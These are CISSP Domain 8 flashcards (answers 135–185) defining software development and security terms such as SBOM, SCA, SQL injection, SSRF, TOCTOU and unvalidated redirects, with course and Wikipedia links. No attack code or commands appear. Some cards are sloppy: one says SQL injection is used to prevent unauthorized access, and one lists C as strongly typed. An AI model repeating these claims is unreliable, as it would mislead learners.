A situation where the behavior of a system depends on the sequence and timing of uncontrollable events, leading to unpredictable results. ## Footnote A situation in which multiple processes or threads are competing for the same resources, and the outcome depends on the order in which they are executed. It is a common issue in the field of computer science and can lead to unpredictable or incorrect behavior. Examples include the use of locks and semaphores to prevent race conditions, the use of atomic operations to ensure sequential execution, and the use of concurrency control techniques to manage shared resources. *For more information, view this lecture on [Software vulnerabilities and Attacks.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182134-software-vulnerabilities-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Race_condition).*

Answer 135

A software development approach prioritizing rapid prototyping and iterative user feedback over strict planning. ## Footnote A software development methodology that emphasizes speed and flexibility over traditional planning and design processes. It is used to quickly prototype and iterate on software ideas. Examples of RAD include using agile development methodologies or using low-code platforms to quickly build applications. *For more information, view this lecture on [Software development methodologies part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182096-software-development-methodologies-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Rapid_application_development).*

Answer 136

The process of restructuring existing code without changing its external behavior to improve its readability and maintainability. ## Footnote The process of restructuring or reorganizing existing code while maintaining its functionality. This practice is used to enhance code readability, reduce complexity, improve source code maintainability, and optimize system efficiency. It also facilitates easier troubleshooting and upgradeability, helping in identifying potential vulnerabilities and ensuring code adheres to the latest coding standards. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Code_refactoring).*

Answer 137

A system that stores data in tables with relationships between them, supporting structured queries and transactions. ## Footnote A type of database management system that uses a relational model to organize data into tables and establish relationships between them. Used in database management and data analysis. Examples -MySQL, Microsoft SQL Server, Oracle Database. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Relational_database_management_system).*

Answer 138

A structure for organizing data into tables of rows and columns, featuring relations among data entities. ## Footnote A data model that represents data as a set of formally described tables from which data can be accessed or reassembled in various ways without needing to reorganize the tables themselves. This model was conceived by E.F. Codd, and it forms the theoretical basis of relational databases. It uses a standard method to store and retrieve data and is widely used due to its simplicity, flexibility, and efficiency. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or view this lecture on [Databases - part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Relational_model).*

Answer 139

The deployment of software to production, including new features, updates, or patches, after successful testing and approval. ## Footnote Release in change management refers to the stage where tested and validated changes are implemented into the live environment. This phase includes managing the release schedule, ensuring all parties impacted are informed about the changes, and verifying the system functions as expected after the release. Effective release management requires careful oversight to ensure no new vulnerabilities are introduced and existing security controls continue to function as intended in the changed environment. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_release_life_cycle).*

Answer 140

A label indicating the version of a software release, often consisting of numbers that denote the iteration of development or updates. ## Footnote A label, often consisting of numbers and potentially letters, which denotes the version of a software release. This identifier helps to track the sequential development, enhancements, and fixes in software. It provides clarity and version control for developers and users, distinguishing between different stages of software development, like alpha, beta, and final releases.

Answer 141

A centralized location for storing and managing data, such as version-controlled code repositories for software development. ## Footnote A central location in which data is stored and managed. In terms of software development, it's often used to manage and store different versions of code files. A repository can be local to a user's machine, or it can be a storage space on a server or on the cloud. Repositories are crucial in maintaining data integrity, version control, and facilitating collaboration among multiple users or teams. *For more information, view this lecture on [Software development methodologies part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or view this lecture on [Digital signatures.](https://courses.thorteaches.com/courses/take/cissp/lessons/19149728-digital-signatures). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Repository).*

Answer 142

The structure of a database, defining how data is organized, stored, and related within the database system. ## Footnote A structured framework or blueprint describing how data is organized and managed within a database. It defines the tables, fields, relationships, constraints, and other elements of a database, acting as a roadmap for how data is stored and accessed. Schemas are critical for maintaining data integrity, enabling efficient data retrieval and modification, and ensuring that the database structure supports the needs of the applications that interact with it. *For more information, view this lecture on [Databases - part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_schema).*

Answer 143

Uncontrolled changes in a project's scope, leading to potential delays, cost overruns, or diminished quality. ## Footnote A project management term referring to the uncontrolled changes or continuous growth in a project's scope after the project work has started. These changes can occur due to various reasons, such as changes in requirements, miscommunication, or lack of clear initial requirements, and can lead to delays, cost overruns, or quality issues. Managing scope creep involves setting clear project objectives, maintaining effective communication, and closely monitoring changes to the project's scope to ensure alignment with project goals and resources. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Scope_creep).*

Answer 144

A framework for agile software development that facilitates collaboration and rapid iteration. ## Footnote A framework for implementing agile software development. Scrum provides a structured yet flexible set of principles, practices, roles, and ceremonies that enable teams to work collaboratively to manage work and produce deliverables in short cycles known as sprints. Central to Scrum is the idea of iterative and incremental development, where requirements and solutions evolve through collaborative effort. Key roles in Scrum include the Product Owner, Scrum Master, and Development Team. Scrum enables organizations to adapt to changing requirements, prioritize work effectively, and deliver high-quality products that meet user needs. It is widely used in software development and increasingly applied in other domains requiring a flexible project management approach. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Scrum_(software_development)).*

Answer 145

SDKs are collections of tools, libraries, and documentation that enable developers to build applications for a specific platform, framework, or service more easily. ## Footnote Examples include mobile OS SDKs, cloud provider APIs, or specialized gaming engines. These kits streamline integration, reducing coding complexity and accelerating development cycles. Properly vetted SDKs ensure performance and security, but poorly maintained or maliciously altered packages can introduce vulnerabilities. Consistent updates, security reviews, and best practices in dependency management help prevent exploit risks and maintain reliable software. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_development_kit).*

Answer 146

SSDLC integrates security checks and best practices into every phase of software development—from initial design to deployment—reducing vulnerabilities and ensuring safer applications. ## Footnote By incorporating threat modeling, code reviews, and automated testing early, developers catch issues before they become costly to fix. SSDLC phases typically include requirements analysis, design, implementation, testing, and maintenance, with continuous feedback loops. Tools like static/dynamic application security testing and container scanning help enforce security policies. A mature SSDLC fosters a culture where security is everyone’s responsibility, ultimately minimizing the risk of breaches and compliance violations.

Answer 147

Security as Code applies the principles of Infrastructure as Code to automate and version-control security configurations, policies, and checks, ensuring consistency and traceability across environments. ## Footnote By embedding security rules into scripts or configuration files, teams can set up automated scans, access policies, and compliance checks in a repeatable manner. This approach reduces manual errors, speeds up provisioning, and provides an audit trail. Integrated into CI/CD pipelines, Security as Code enforces best practices at every commit. In dynamic cloud-native settings, it improves agility while maintaining standardized defenses.

Answer 148

A Java application component that runs on a server to handle requests and generate dynamic web content. ## Footnote A Java-based program that runs on a web server and dynamically generates content for web pages. It is used in web development to create interactive and dynamic web applications. Examples include a servlet that retrieves data from a database and displays it on a web page or a servlet that processes form submissions. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_servlet).*

Answer 149

An attack capturing session cookies through interception to hijack active sessions. ## Footnote A type of attack where an attacker intercepts and hijacks a user's session by stealing their session cookie. It is commonly used in wireless networks, where the attacker may use tools like a packet sniffer to capture unencrypted session cookies. For example, an attacker may use session sidejacking to gain access to a user's online bank account or social media account. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Session_hijacking#Methods).*

Answer 150

Using a command-line interface or shell to automate tasks and manage systems. ## Footnote The use of a shell to automate tasks and perform complex operations on a computer. It is used in system administration and automation to efficiently manage and manipulate system resources. Examples include shell scripts to automate backups or to monitor system performance. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Shell_script).*

Answer 151

A Java applet that was digitally signed by its developer, now outdated due to security concerns. ## Footnote A small, downloadable program once used within web browsers that has been digitally signed by the developer to confirm its source and integrity. Due to security concerns, modern browsers have phased out support for applets in favor of more secure and versatile technologies like HTML5 and WebAssembly.

Answer 152

Smart Contract Security focuses on safely developing and auditing blockchain-based contracts, preventing flaws that may lead to financial loss, fraud, or unauthorized transactions. ## Footnote Smart contracts automate digital transactions and logic—such as token transfers or escrow services—on decentralized platforms like Ethereum. Coding errors, logic bugs, or vulnerabilities can be exploited by attackers, causing irreparable harm. Security best practices include formal verification, code reviews, and concurrency safeguards. Tools like fuzzers and static analyzers help find issues before deployment. Since blockchain transactions are often immutable, meticulous security is paramount to avoid catastrophic failures. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Smart_contract#Security_issues).*

Answer 153

Instructions and data that enable computers to perform tasks and solve problems. ## Footnote A set of instructions that tell a computer how to perform a specific task or function. It is commonly used to run applications, access the internet, and perform various other tasks on a computer or device. Examples of software include operating systems, web browsers, and productivity suites. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software).*

Answer 154

The confidence in the security and correctness of software throughout its lifecycle. ## Footnote The process and practice of ensuring that software is developed and operated in a manner that it functions correctly, is free from vulnerabilities and does not inflict harm upon the system or data. Software assurance covers the entire software lifecycle, from the initial design to maintenance and decommissioning. It involves various practices such as secure coding standards, code reviews, automated testing, vulnerability assessments, and security audits. The goal of software assurance is to build confidence that the software is secure and reliable and that it maintains integrity and availability in alignment with organizational and user expectations. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_assurance).*

Answer 155

A framework for evaluating and improving the security of software development processes. ## Footnote A framework for assessing and improving the security of an organization's software development processes. It is used to identify and prioritize areas for improvement in software security. Examples of organizations that may use SAMM include software development companies and in-house software development teams. *For more information, view this lecture on [Maturity Models - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182137-maturity-models-part-1). Or visit this [Wikipedia page](https://owaspsamm.org/).*

Answer 156

Organizational strategies for ensuring secure and reliable software through secure development practices and regular updates. ## Footnote The set of organizational guidelines and activities designed to ensure that software is secure and reliable. This includes enforcing secure development methodologies, requiring regular software updates and security patches, and performing security and quality assurance testing throughout the software lifecycle.

Answer 157

An SBOM is an inventory listing all components, dependencies, and licenses used in an application, promoting transparency and easier vulnerability tracking. ## Footnote Delivering an SBOM enables organizations to identify which libraries or modules they rely on and whether any contain known security flaws. This visibility aids in rapid updates or patches when vulnerabilities arise. SBOMs also facilitate license compliance and supply-chain risk assessment. Standards groups like the U.S. government encourage SBOM adoption. Maintaining a current SBOM reduces blind spots, helping teams respond quickly to security threats. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_supply_chain).*

Answer 158

SCA automates the identification, tracking, and management of open-source components in applications, detecting known vulnerabilities and license compliance issues. ## Footnote Developers routinely use third-party libraries for faster coding, but outdated or unpatched dependencies introduce risks. SCA tools scan source code or build artifacts to map external components, matching them against databases like the National Vulnerability Database. When a vulnerability is found, teams can prioritize patching or replacing that library. Proper SCA practices ensure a secure supply chain, mitigate legal complications, and maintain robust software quality. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_composition_analysis).*

Answer 159

A process for tracking and controlling software changes to maintain integrity and traceability. ## Footnote The process of tracking and controlling changes to software systems. It is used in software development to ensure that changes to the code do not negatively impact the system's functionality. Examples include using version control systems, establishing change management processes, and conducting impact analysis for new code changes. *For more information, view this lecture on [Configuration Management](https://courses.thorteaches.com/courses/take/cissp/lessons/19180328-configuration-management). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_configuration_management).*

Answer 160

A legal arrangement where source code is stored with a third party, accessible under specific conditions to ensure continuity of support. ## Footnote The process of depositing a copy of software code with a third party to ensure that the code is available in the event that the software developer becomes unable or unwilling to provide support or updates. It is used in software licensing agreements to protect the user's interests. Examples include using escrow agreements for proprietary software, storing multiple copies of the code in different locations, and regularly verifying the integrity of the code in escrow. *For more information, view this lecture on [Software development methodologies part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Source_code_escrow).*

Answer 161

A set of activities designed to ensure software meets specified standards for quality and functionality. ## Footnote A process used to ensure that software meets certain standards of quality and functionality. It is used throughout the development and testing of software to identify and fix defects before the software is released to users. Examples of software quality assurance include running automated tests on new code to ensure it meets standards, conducting user acceptance testing to ensure the software meets business requirements, and conducting code reviews to identify potential issues. *For more information, view this lecture on [Software testing - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19180056-software-testing-part-1). Or view this lecture on [Software testing - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/33748175-software-testing-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_quality_assurance).*

Answer 162

A structured process to confirm a software system's readiness before deployment. ## Footnote A formalized process in software engineering that involves conducting a series of tests and evaluations to ensure a software system performs according to its design and meets user requirements. These activities include compliance testing, security testing, performance testing, and user testing, among others, to assess the system's readiness for deployment. *For more information, view this lecture on [Software testing - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19180056-software-testing-part-1). Or view this lecture on [Software testing - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/33748175-software-testing-part-2).*

Answer 163

The original code written by programmers in a high-level language before being compiled into an executable program. ## Footnote The human-readable instructions that make up a program or software. Written in a high-level programming language, source code outlines the functions, operations, and structure of a software application. It's the foundational layer that developers interact with, and thus, its quality, clarity, and security have direct implications on the functionality and security of the resulting software. Appropriate measures, such as code reviews and audits, are crucial for identifying potential vulnerabilities and ensuring the reliability of the software. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Source_code).*

Answer 164

A tool for identifying changes between two versions of a program's source code. ## Footnote A tool that compares two versions of source code to identify differences and changes between them. It is used in software development to track code changes and to facilitate code reviews. Examples include using diff tools, version control systems, and code review platforms.

Answer 165

An attack method where malicious SQL statements are inserted into an entry field for execution. ## Footnote A type of attack where an attacker injects malicious code into an SQL database through user input fields. It is used in database security to prevent unauthorized access and data manipulation. Examples include inserting malicious code into a login form to gain access to the database or inserting code into a search form to retrieve sensitive information. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/SQL_injection).*

Answer 166

SSRF vulnerabilities let attackers manipulate server-side applications to send unauthorized requests, often targeting internal services or cloud metadata endpoints. ## Footnote By crafting malicious URLs in parameters, adversaries direct the server to fetch resources, bypassing firewalls or exposing sensitive data. SSRF can uncover credentials, escalate privileges, or pivot within networks. Protective measures include validating and sanitizing URLs, implementing network segmentation, and limiting outbound requests. Recognizing SSRF signs is crucial in safeguarding internal infrastructure and reducing attack surfaces. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Server-side_request_forgery).*

Answer 167

A staging environment is a pre-production setup that closely replicates the live system, used for final testing and quality assurance before code deployment. ## Footnote This environment mirrors production configurations, datasets, and integrations, enabling teams to catch performance bottlenecks, compatibility issues, or security flaws. Staging ensures minimal risk by identifying bugs prior to release. Proper isolation from the public domain prevents data leaks or accidental user exposure. Thorough testing and sign-off in staging foster smoother launches and higher confidence in deployed solutions. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Deployment_environment#Testing).*

Answer 168

An individual or entity impacted by or interested in the outcome of a decision, project, or policy, such as business leaders, regulatory bodies, or customers. ## Footnote Any individual, group, or organization that has an interest in or can be affected by the outcome of a particular decision, project, or policy. In the context of a security framework or policy, stakeholders may include business leaders, employees, customers, partners, or regulatory bodies. Each stakeholder's needs and concerns must be considered during the development and implementation of security measures to ensure comprehensive protection and compliance with all applicable standards and regulations. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Stakeholder_(corporate)).*

Answer 169

Languages that enforce strict data type rules for variables, enhancing code safety and reliability. ## Footnote Strongly typed languages are those that enforce strict rules for data types and variables. This means that variables must be declared with a specific data type and cannot be changed or used in ways that are not allowed for that data type. Examples of strongly typed languages include C, C++, and Java. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Type_system#Strong_and_weak_typing).*

Answer 170

A programming paradigm that emphasizes clear, hierarchical control structures for program design. ## Footnote A paradigm of designing programs where the flow of control is governed by structured blocks, typically using sequences, selections, and loops. The main aim of structured programming is to enhance the clarity, quality, and development time of a computer program by making use of subroutines, loop control structures, and block structures. Its principles increase the maintainability and reliability of software, reducing the likelihood of bugs and vulnerabilities. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Structured_programming).*

Answer 171

A specialized language for managing and manipulating data in relational databases. ## Footnote A programming language used for managing and manipulating data in relational databases. It is used in many industries, including finance, healthcare, and retail, to store and retrieve data from databases. Examples include using SQL to query a customer database for information, to update account balances in a financial system, or to track inventory levels in a supply chain. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/SQL).*

Answer 172

A framework guiding the creation and maintenance of systems through several stages. ## Footnote An organized framework that guides the process of creating and maintaining systems. The SDLC encompasses stages from initial planning and analysis through design, development, testing, deployment, and maintenance to ensure the system's efficiency and alignment with user requirements. Examples of SDLC models include Waterfall, Agile, and DevOps. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Systems_development_life_cycle).*

Answer 173

Searching for a value in a table or database, a common operation in data retrieval and analysis. ## Footnote The process of searching for a specific value or record in a table or database. It is used in various industries, including healthcare, finance, and information technology, to quickly retrieve and analyze data. Examples include searching for a patient's medical history in a hospital database, looking up a customer's account information in a bank's system, and searching for a specific product on an e-commerce website. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Table_(database)).*

Answer 174

A Test environment is a controlled setup where developers and QA teams experiment, debug, and validate software before moving code to staging or production. ## Footnote It may differ from real-world conditions for quick iteration, focusing on unit tests or integration checks. Frequent code deployments identify functionality gaps and confirm bug fixes. By isolating new features or patches, the test environment prevents disruptions to user-facing systems. Comprehensive testing ensures stable releases, curtails regressions, and refines performance metrics ahead of broader deployment cycles. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Deployment_environment#Testing).*

Answer 175

Software created by companies other than the system manufacturer or end-user, which can introduce security risks. ## Footnote Any software product or service that is created and maintained by an entity other than the original manufacturer or the end user. Examples could include additional applications on a computer's operating system, plugins for a web browser, or a specialized tool that is integrated with a larger software suite. Although third-party software can provide useful functionality, it also presents potential security risks, so it's essential to ensure that any such software is reputable, well-maintained, and compatible with existing security measures. *For more information, view this lecture on [Buying software from other companies.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182140-buying-software-from-other-companies). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Third-party_software_component).*

Answer 176

The smallest sequence of programmed instructions that can be managed independently by a scheduler. ## Footnote The smallest unit of processing that can be performed by an operating system. Threads run within processes and share the same resources, such as memory and file handles, making them lightweight and efficient. However, multithreading environments require careful consideration of data integrity and concurrent execution issues. *For more information, view this lecture on [Hardware architecture- Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/18591300-hardware-architecture-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Thread_(computing)).*

Answer 177

An exploit that targets the window between verifying a condition and using a resource. ## Footnote A security exploit that takes advantage of the timing window between checking a condition (like a file's attributes) and using it (opening the file). Attackers exploit this window to manipulate conditions and gain unauthorized access or perform illicit actions, challenging systems to ensure a consistent state between verification and action. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use).*

Answer 178

An ordered set of elements, often representing a database record, where access may be regulated for data protection. ## Footnote A tuple is an ordered collection of elements that typically represents a single row in a relational database table. Each element, or attribute, of the tuple corresponds to a column of the table. In terms of security, tuples are significant as database access control policies often regulate operations based on tuple attributes to ensure data integrity and confidentiality. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Tuple).*

Answer 179

A consensus protocol in distributed computing ensuring transaction consistency across multiple systems. ## Footnote A protocol used in distributed computing to achieve consensus across multiple systems or components during a transaction. The protocol involves two phases - the prepare phase, where all systems are asked if they are ready to commit to a transaction, and the commit phase, where the transaction is either committed on all systems or rolled back on all systems to maintain consistency. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Two-phase_commit_protocol).*

Answer 180

An unvalidated redirect vulnerability arises when a web application redirects users to external URLs without verifying or sanitizing user input, letting attackers create phishing or malicious links. ## Footnote By manipulating parameters, adversaries trick victims into following legitimate-looking URLs that lead to harmful sites. This exploit can harvest credentials, distribute malware, or compromise user trust. Mitigations involve restricting valid redirect destinations, coding allowlists, and thoroughly validating user input. Preventing unvalidated redirects preserves brand reputation and helps protect users from cross-site exploits. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4).*

Answer 181

A sequential project management methodology where each phase must be completed before moving to the next. ## Footnote A linear project management approach where progress flows downwards, similar to a waterfall, through various stages such as conception, initiation, analysis, design, construction, testing, deployment, and maintenance. Each stage must be fully completed before moving to the next, providing a structured, sequential process that leaves little room for backtracking or revising previous stages. *For more information, view this lecture on [Software development methodologies part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182089-software-development-methodologies-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Waterfall_model).*

Answer 182

Languages that do not require variables to be defined with a specific data type and convert types automatically during execution. ## Footnote In weakly typed programming languages, variables are not bound to a specific data type; they can hold any type of value at run time. The programming language automatically converts types as needed during script execution, which can lead to unexpected behavior if not carefully handled. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Strong_and_weak_typing).*

Answer 183

Protecting web applications from cyber threats through various security measures and monitoring. ## Footnote The process of protecting web applications by detecting, preventing, and responding to cyber threats. This discipline encompasses the security measures taken throughout the application's lifecycle, addressing vulnerabilities to prevent attacks such as SQL injection, cross-site scripting, and data breaches. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Web_application_security).*

Answer 184

A project management tool decomposing a project into manageable tasks, useful for planning security projects. ## Footnote A tool used in project management that represents a hierarchical decomposition of a project into manageable components or tasks. In the context of a security project, the WBS might include tasks like threat modeling, security requirements analysis, and system hardening, each of which could be further broken down into more specific tasks. The WBS aids in tracking project progress, managing dependencies, and assigning resources. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Work_breakdown_structure).*

Answer 185

YAML is a human-friendly, structured data serialization format often used for configuration files, supporting hierarchical and complex data representations. ## Footnote It relies on indentation rather than braces, enhancing readability. Commonly seen in DevOps tools like Ansible or Kubernetes, YAML defines services, deployment parameters, and more. Its flexible syntax simplifies manual editing, though strict indentation can cause parsing errors. With support in many programming languages, YAML has become a popular choice for easily maintainable, clear configuration management. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/YAML).*

Domain 8: Software Development Security Flashcards

Learn vocabulary related to secure coding, development practices, and software vulnerabilities.